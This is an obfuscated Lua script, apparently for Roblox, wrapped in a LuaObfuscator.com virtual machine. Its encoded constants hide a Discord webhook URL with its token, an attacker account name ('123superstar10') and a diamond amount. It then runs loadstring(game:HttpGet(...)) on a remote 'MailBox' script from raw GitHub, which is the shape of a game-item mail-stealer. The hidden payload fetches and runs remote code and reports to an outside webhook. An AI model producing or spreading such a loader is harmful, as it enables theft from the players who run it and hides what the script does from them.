--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v90=v5(v82,v19);v19=nil;return v90;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-((1 + 0) -0)) -(v32-1)) + (2 -1))) ;return v83-(v83%1) ;else local v84=(621 -(555 + 64))^(v32-((1809 -(282 + 595)) -(857 + 74))) ;return (((v31%(v84 + v84))>=v84) and ((2206 -(1523 + 114)) -(367 + 201))) or (927 -(214 + 713)) ;end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1271 -((343 -(32 + 85)) + 1044) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v37 * (1213 -(892 + 65))) + v36 ;end local function v23()local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;v38=(2 -1) -(0 + 0) ;end if (v38==1) then return (v42 * (16777566 -((345 -258) + 263))) + (v41 * (65716 -(67 + (1065 -(802 + 150))))) + (v40 * (188 + 68)) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1,(16 + 20) -16 ) * ((2 + 0)^32)) + v43 ;local v47=v20(v44,21,1028 -(915 + 82) );local v48=((v20(v44,90 -58 )==(1 + 0)) and  -(1 -0)) or (1188 -(1069 + 118)) ;if (v47==(0 -0)) then if (v46==(0 -0)) then return v48 * (0 -0) ;else local v91=0 + 0 ;while true do if (v91==(0 -0)) then v47=1;v45=(438 -(145 + 293)) + 0 ;break;end end end elseif (v47==(2838 -(368 + 423))) then return ((v46==0) and (v48 * ((3 -2)/(18 -(10 + (438 -(44 + 386))))))) or (v48 * NaN) ;end return v8(v48,v47-(3934 -2911) ) * (v45 + (v46/((444 -(416 + 26))^(165 -113)))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(1486 -(998 + 488))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v66=1 + 0 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=3) then else v59=nil;while true do if (v53~=(0 -0)) then else local v96=0;local v97;while true do if (v96~=0) then else v97=0;while true do if (v97~=(0 -0)) then else local v162=374 -(123 + 251) ;while true do if ((4 -3)==v162) then v97=699 -(208 + 490) ;break;end if ((0 + 0)~=v162) then else v54={};v55={};v162=1 + 0 ;end end end if (v97==1) then v56={};v53=1;break;end end break;end end end if (v53~=3) then else for v100=1,v23() do v55[v100-(837 -(660 + 176)) ]=v28();end return v57;end if (v53==(1 + 0)) then local v98=0;while true do if (v98==0) then v57={v54,v55,nil,v56};v58=v23();v98=1;end if (v98==(203 -(14 + 188))) then v59={};v53=677 -(534 + 141) ;break;end end end if ((1 + 1)==v53) then for v102=1,v58 do local v103=0;local v104;local v105;local v106;local v107;while true do if (v103==2) then while true do if (v104~=(0 + 0)) then else local v174=0 + 0 ;while true do if (v174~=(1 -0)) then else v104=1 -0 ;break;end if (v174==0) then v105=0 -0 ;v106=nil;v174=1;end end end if (v104==(1 + 0)) then v107=nil;while true do if (v105==(1 + 0)) then if (v106==(397 -(115 + 281))) then v107=v21()~=0 ;elseif (v106==(4 -2)) then v107=v24();elseif (v106==(3 + 0)) then v107=v25();end v59[v102]=v107;break;end if (v105==(0 -0)) then local v194=0;local v195;while true do if (v194~=0) then else v195=0;while true do if (v195==0) then v106=v21();v107=nil;v195=1;end if (v195==(3 -2)) then v105=1;break;end end break;end end end end break;end end break;end if (v103~=(868 -(550 + 317))) then else v106=nil;v107=nil;v103=2;end if (v103~=(0 -0)) then else v104=0 -0 ;v105=nil;v103=1;end end end v57[3]=v21();for v108=2 -1 ,v23() do local v109=0;local v110;while true do if (v109==(285 -(134 + 151))) then v110=v21();if (v20(v110,1666 -(970 + 695) ,1)~=(0 -0)) then else local v163=0;local v164;local v165;local v166;local v167;while true do if (v163==(1991 -(582 + 1408))) then local v189=0 -0 ;while true do if ((1 -0)==v189) then v163=2;break;end if (v189~=0) then else v166=nil;v167=nil;v189=3 -2 ;end end end if (0~=v163) then else local v190=0;while true do if (v190~=1) then else v163=1825 -(1195 + 629) ;break;end if (v190==(0 -0)) then v164=241 -(187 + 54) ;v165=nil;v190=781 -(162 + 618) ;end end end if (v163==(2 + 0)) then while true do if (v164~=(0 + 0)) then else local v196=0 -0 ;while true do if (v196~=(1 -0)) then else v164=1 + 0 ;break;end if ((1636 -(1373 + 263))==v196) then v165=v20(v110,2,3);v166=v20(v110,1004 -(451 + 549) ,2 + 4 );v196=1;end end end if (v164==(4 -1)) then if (v20(v166,4 -1 ,3)==1) then v167[1388 -(746 + 638) ]=v59[v167[2 + 2 ]];end v54[v108]=v167;break;end if (v164~=2) then else local v198=0 -0 ;while true do if (v198==0) then if (v20(v166,342 -(218 + 123) ,1)~=(1582 -(1535 + 46))) then else v167[2 + 0 ]=v59[v167[1 + 1 ]];end if (v20(v166,562 -(306 + 254) ,2)==1) then v167[1 + 2 ]=v59[v167[5 -2 ]];end v198=1;end if ((1468 -(899 + 568))~=v198) then else v164=2 + 1 ;break;end end end if (v164==(2 -1)) then local v199=603 -(268 + 335) ;while true do if (v199==1) then v164=2;break;end if (v199==0) then v167={v22(),v22(),nil,nil};if (v165==0) then local v206=290 -(60 + 230) ;local v207;while true do if (v206==0) then v207=572 -(426 + 146) ;while true do if ((0 + 0)~=v207) then else v167[1459 -(282 + 1174) ]=v22();v167[4]=v22();break;end end break;end end elseif (v165==(812 -(569 + 242))) then v167[8 -5 ]=v23();elseif (v165==(1 + 1)) then v167[1027 -(706 + 318) ]=v23() -((1253 -(721 + 530))^16) ;elseif (v165==(1274 -(945 + 326))) then local v212=0;local v213;local v214;while true do if (v212==(0 -0)) then v213=0 + 0 ;v214=nil;v212=1;end if (v212==(701 -(271 + 429))) then while true do if (v213==0) then v214=0 + 0 ;while true do if (v214~=(1500 -(1408 + 92))) then else v167[3]=v23() -(2^(1102 -(461 + 625))) ;v167[1292 -(993 + 295) ]=v22();break;end end break;end end break;end end end v199=1 + 0 ;end end end end break;end end end break;end end end v53=3;end end break;end if ((1171 -(418 + 753))~=v52) then else v53=0;v54=nil;v52=1 + 0 ;end if (v52==2) then local v88=0;while true do if (v88==(0 + 0)) then v57=nil;v58=nil;v88=1 + 0 ;end if (v88==1) then v52=1 + 2 ;break;end end end if (v52==(530 -(406 + 123))) then local v89=0;while true do if ((1769 -(1749 + 20))~=v89) then else v55=nil;v56=nil;v89=1;end if (v89==(1 + 0)) then v52=2;break;end end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v85=0,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=5) then if (v81<=2) then if (v81<=0) then local v111=0;local v112;local v113;local v114;local v115;while true do if (v111==1) then v73=(v114 + v112) -1 ;v115=0;v111=2;end if (0==v111) then v112=v80[2];v113,v114=v71(v78[v112](v13(v78,v112 + 1 ,v80[3])));v111=1;end if (v111==2) then for v168=v112,v73 do local v169=0;while true do if (v169==0) then v115=v115 + 1 ;v78[v168]=v113[v115];break;end end end break;end end elseif (v81>1) then v78[v80[2]]=v62[v80[3]];else v72=v80[3];end elseif (v81<=3) then v78[v80[2]]();elseif (v81==4) then local v127=0;local v128;while true do if (v127==0) then v128=v80[2];v78[v128]=v78[v128](v13(v78,v128 + 1 ,v73));break;end end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=8) then if (v81<=6) then local v116=0;local v117;local v118;local v119;local v120;local v121;while true do if (v116==4) then v78[v121]=v120[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v116=5;end if (v116==6) then v73=(v119 + v121) -1 ;v117=0;for v171=v121,v73 do v117=v117 + 1 ;v78[v171]=v118[v117];end v72=v72 + 1 ;v116=7;end if (v116==8) then v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v116=9;end if (0==v116) then v117=nil;v118,v119=nil;v120=nil;v121=nil;v116=1;end if (v116==5) then v72=v72 + 1 ;v80=v68[v72];v121=v80[2];v118,v119=v71(v78[v121](v13(v78,v121 + 1 ,v80[3])));v116=6;end if (v116==9) then v72=v80[3];break;end if (2==v116) then v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v116=3;end if (v116==1) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v116=2;end if (v116==3) then v80=v68[v72];v121=v80[2];v120=v78[v80[3]];v78[v121 + 1 ]=v120;v116=4;end if (v116==7) then v80=v68[v72];v121=v80[2];v78[v121]=v78[v121](v13(v78,v121 + 1 ,v73));v72=v72 + 1 ;v116=8;end end elseif (v81>7) then local v129=0;while true do if (v129==1) then v72=v72 + 1 ;v80=v68[v72];v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v129=2;end if (v129==2) then v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v129=3;end if (v129==0) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v129=1;end if (3==v129) then v72=v80[3];break;end end else local v130=v80[2];local v131=v78[v80[3]];v78[v130 + 1 ]=v131;v78[v130]=v131[v80[4]];end elseif (v81<=9) then v78[v80[2]][v80[3]]=v80[4];elseif (v81==10) then v78[v80[2]]=v80[3];else do return;end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313039353631322O3533373637322O3036352F49337870696545425F5275725961634D6A4876714E2O566D5866566C70416633472D3563486658676B5A554157417856386F536F676C346B325A712D654B3355437A364D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B316E736372697074732F4D61696C426F782F6D61696E2F54616C6572616E2E6C756103083O00557365726E616D65030E3O00313233737570657273746172313003083O004469616D6F6E6473024O002O841E4100163O00120A3O00013O0026053O000D000100020004013O000D0001001202000100033O00300600010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O001500010026053O0001000100010004013O00010001001202000100033O0030080001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O000B3O00017O00",v9(),...);end
